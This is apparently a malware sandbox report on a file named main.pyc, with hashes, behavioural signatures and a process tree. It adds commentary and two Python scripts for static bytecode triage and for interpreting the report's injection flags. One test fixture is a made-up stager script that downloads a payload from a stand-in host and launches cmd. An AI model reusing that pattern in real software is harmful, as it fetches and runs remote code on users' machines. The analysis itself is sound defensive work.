Analysis

- max time kernel: 107s
- max time network: 121s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 03/02/2024, 14:03
Behavioral tasks

Task          Sample                Resource
behavioral1   Xotic_Activator.exe   win7-20231129-en
behavioral2   Xotic_Activator.exe   win10v2004-20231215-en
behavioral3   main.pyc              win7-20231215-en
behavioral4   main.pyc              win10v2004-20231215-en   (this report: target main.pyc on win10v2004-20231215-en)
General

- Target: main.pyc
- Size: 4KB
- MD5: 78044e0945749775910ce61a3a0c8f74
- SHA1: 72ed0e3180c2f62b1e70c08dda96dc083f2a0074
- SHA256: 391cda8393509999ba2bc99c764de7ddb6b5b03a70a29af87bf50a1d5e09a17e
- SHA512: a77820098223d5ff35f93da1876556b1dcda5f14837a155b9db73140dfb2e792e7137decfa342e9321ff96e06330ac48d392b35512b0e7f8145db6da664a06ab
- SSDEEP: 96:QEHXKag/on8jIIVTfHAlVPflDji+kgZjPlsx9SHfUh:d6agwIVTfJgZy3Nh
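The General block identifies main.pyc by hash, but the sandbox never interpreted the bytecode: the Processes section below shows the file being handed to Notepad, so the report says nothing about what the module does. A compiled Python module is a 16-byte PEP 552 header followed by a marshalled code object, which means a .pyc can be triaged statically with the standard library. The script below is an added example, not tria.ge's code and not anything from the sample's author; because the real main.pyc is not on the page it builds a stand-in .pyc from a constructed script (SAMPLE_SOURCE, hypothetical), reads the header, refuses to load bytecode compiled for a different interpreter, and lists the imports, names and string constants reachable without executing anything. Function names are mine.

```python
import dis
import importlib.util
import marshal
import struct
import types

HEADER_LEN = 16  # PEP 552: magic(4) + flags(4) + (mtime, size) or an 8-byte source hash

# Constructed fixture standing in for main.pyc; the real sample's bytecode is not on the page.
SAMPLE_SOURCE = '''import os, subprocess
from urllib.request import urlopen

def run():
    data = urlopen("http://example.invalid/payload").read()
    subprocess.run(["cmd", "/c", "echo", "stage2"])

run()
'''


def build_pyc(source: str) -> bytes:
    """Timestamp-based .pyc for the running interpreter (flags=0, mtime=0)."""
    code = compile(source, "main.py", "exec")
    header = importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, 0, len(source))
    return header + marshal.dumps(code)


def parse_header(data: bytes) -> dict:
    """Decode the 16-byte header without touching the marshalled payload."""
    if len(data) < HEADER_LEN:
        raise ValueError("too short to be a .pyc")
    magic = data[:4]
    (flags,) = struct.unpack("<I", data[4:8])
    info = {"magic": magic, "hash_based": bool(flags & 1), "check_source": bool(flags & 2),
            "same_interpreter": magic == importlib.util.MAGIC_NUMBER}
    if info["hash_based"]:
        info["source_hash"] = data[8:16].hex()
    else:
        info["mtime"], info["source_size"] = struct.unpack("<II", data[8:16])
    return info


def _strings(const):
    """Yield string constants, descending into tuple/frozenset consts
    (a list literal compiles to a tuple const plus LIST_EXTEND)."""
    if isinstance(const, str):
        yield const
    elif isinstance(const, (tuple, frozenset)):
        for item in const:
            yield from _strings(item)


def triage(data: bytes) -> dict:
    """Imports, global/attribute names and string constants from every nested
    code object, found with marshal + dis and never by executing the module.
    marshal.loads does not run code (unlike pickle), but it can raise on a
    corrupt payload, so call this inside a try/except when batch-processing."""
    info = parse_header(data)
    if not info["same_interpreter"]:
        # marshal layout and opcodes differ between versions: loading with the
        # wrong interpreter yields garbage or an exception, so insist on a match.
        raise ValueError(f"magic {info['magic'].hex()} is not this interpreter's; use the matching Python")
    imports, names, strings = set(), set(), set()
    stack = [marshal.loads(data[HEADER_LEN:])]
    while stack:
        co = stack.pop()
        names.update(co.co_names)
        for c in co.co_consts:
            if isinstance(c, types.CodeType):
                stack.append(c)
            else:
                strings.update(_strings(c))
        for ins in dis.get_instructions(co):
            if ins.opname == "IMPORT_NAME":
                imports.add(ins.argval)
    return {"header": info, "imports": sorted(imports),
            "names": sorted(names), "strings": sorted(strings)}


if __name__ == "__main__":
    report = triage(build_pyc(SAMPLE_SOURCE))
    for key in ("imports", "names", "strings"):
        print(f"{key}: {report[key]}")
```

On a real sample the magic check is the first thing to look at: a mismatch tells you which CPython release to run the analysis under rather than letting the report default to whatever the sandbox image has.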
Malware Config
Signatures

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- Modifies registry class (2 IoCs)
  description   ioc                                                                                       Process
  Key created   \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings   cmd.exe
  Key created   \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings   OpenWith.exe

- Opens file in notepad (likely ransom note) (1 IoCs)
  pid    Process
  3108   NOTEPAD.EXE

- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  pid    Process
  3164   OpenWith.exe

- Suspicious use of SetWindowsHookEx (17 IoCs)
  pid    Process
  3164   OpenWith.exe   (the same entry is listed 17 times)

- Suspicious use of WriteProcessMemory (2 IoCs)
  description                         pid    Process        procid_target
  PID 3164 wrote to memory of 3108    3164   OpenWith.exe   96
  PID 3164 wrote to memory of 3108    3164   OpenWith.exe   96
Processes

- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\main.pyc
  - Modifies registry class
  PID: 3320

- C:\Windows\system32\OpenWith.exe
  C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 3164

  - C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\main.pyc
    - Opens file in notepad (likely ransom note)
    PID: 3108
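Read together, the process tree and the signatures describe a sample that did not run: cmd /c on a file with no registered handler in the image brings up the shell's open-with prompt (OpenWith.exe, started by COM activation, hence -Embedding), the prompt handed main.pyc to NOTEPAD.EXE, and that is what "Opens file in notepad (likely ransom note)" fired on. The two WriteProcessMemory hits are OpenWith.exe writing into the NOTEPAD.EXE child it had just created, which ordinary process creation also produces; the signature is only interesting when the target is not the writer's own child. The script below is an added example, not part of the report and not tria.ge code: it rebuilds parent/child links from the report's depth markers and applies those two checks to the report's own data, re-typed here as Python literals. The helper names are mine.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str
    cmdline: str
    depth: int  # tria.ge's "1⤵"/"2⤵" marker: 2 means child of the nearest depth-1 entry above


# Constructed from the report's Processes section (re-typed, same order as rendered).
REPORT_PROCESSES = [
    Proc(3320, r"C:\Windows\system32\cmd.exe",
         r"cmd /c C:\Users\Admin\AppData\Local\Temp\main.pyc", 1),
    Proc(3164, r"C:\Windows\system32\OpenWith.exe",
         r"C:\Windows\system32\OpenWith.exe -Embedding", 1),
    Proc(3108, r"C:\Windows\system32\NOTEPAD.EXE",
         r'"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\main.pyc', 2),
]

# The two "Suspicious use of WriteProcessMemory" descriptions, verbatim from the report.
WPM_IOCS = [
    "PID 3164 wrote to memory of 3108",
    "PID 3164 wrote to memory of 3108",
]

SAMPLE_PATH = r"C:\Users\Admin\AppData\Local\Temp\main.pyc"
WPM_RE = re.compile(r"PID (\d+) wrote to memory of (\d+)")


def parent_map(procs):
    """pid -> parent pid (None for top-level), derived from the depth markers."""
    parents, ancestors = {}, []
    for p in procs:
        del ancestors[p.depth - 1:]          # drop siblings and deeper entries
        parents[p.pid] = ancestors[-1] if ancestors else None
        ancestors.append(p.pid)
    return parents


def classify_wpm(iocs, procs):
    """De-duplicate WriteProcessMemory IoCs and label each writer/target pair:
    'parent-to-child' (normal at process creation), 'cross-process' (injection
    candidate) or 'unknown-target' (target missing from the tree)."""
    parents = parent_map(procs)
    known = {p.pid for p in procs}
    counts = {}
    for line in iocs:
        m = WPM_RE.fullmatch(line.strip())
        if not m:
            raise ValueError(f"unrecognised IoC line: {line!r}")
        pair = (int(m.group(1)), int(m.group(2)))
        counts[pair] = counts.get(pair, 0) + 1
    out = []
    for (writer, target), n in counts.items():
        if parents.get(target) == writer:
            verdict = "parent-to-child"
        elif target in known:
            verdict = "cross-process"
        else:
            verdict = "unknown-target"
        out.append((writer, target, n, verdict))
    return out


def notepad_opened_sample(procs, sample_path):
    """True when NOTEPAD.EXE was started by OpenWith.exe on the submitted file
    itself: the 'ransom note' is Windows' open-with prompt for an extension
    with no handler, so the sample did not execute."""
    parents = parent_map(procs)
    by_pid = {p.pid: p for p in procs}
    for p in procs:
        if p.image.lower().endswith("notepad.exe") and sample_path.lower() in p.cmdline.lower():
            parent = by_pid.get(parents[p.pid])
            if parent is not None and parent.image.lower().endswith("openwith.exe"):
                return True
    return False


if __name__ == "__main__":
    for writer, target, n, verdict in classify_wpm(WPM_IOCS, REPORT_PROCESSES):
        print(f"WriteProcessMemory {writer} -> {target} x{n}: {verdict}")
    print("notepad opened the sample itself:", notepad_opened_sample(REPORT_PROCESSES, SAMPLE_PATH))
```

The practical consequence for this submission is that the Windows 10 task for main.pyc is a null result, not a clean one; to get behaviour out of the bytecode it has to be re-run in an image with a matching Python interpreter, or inspected statically.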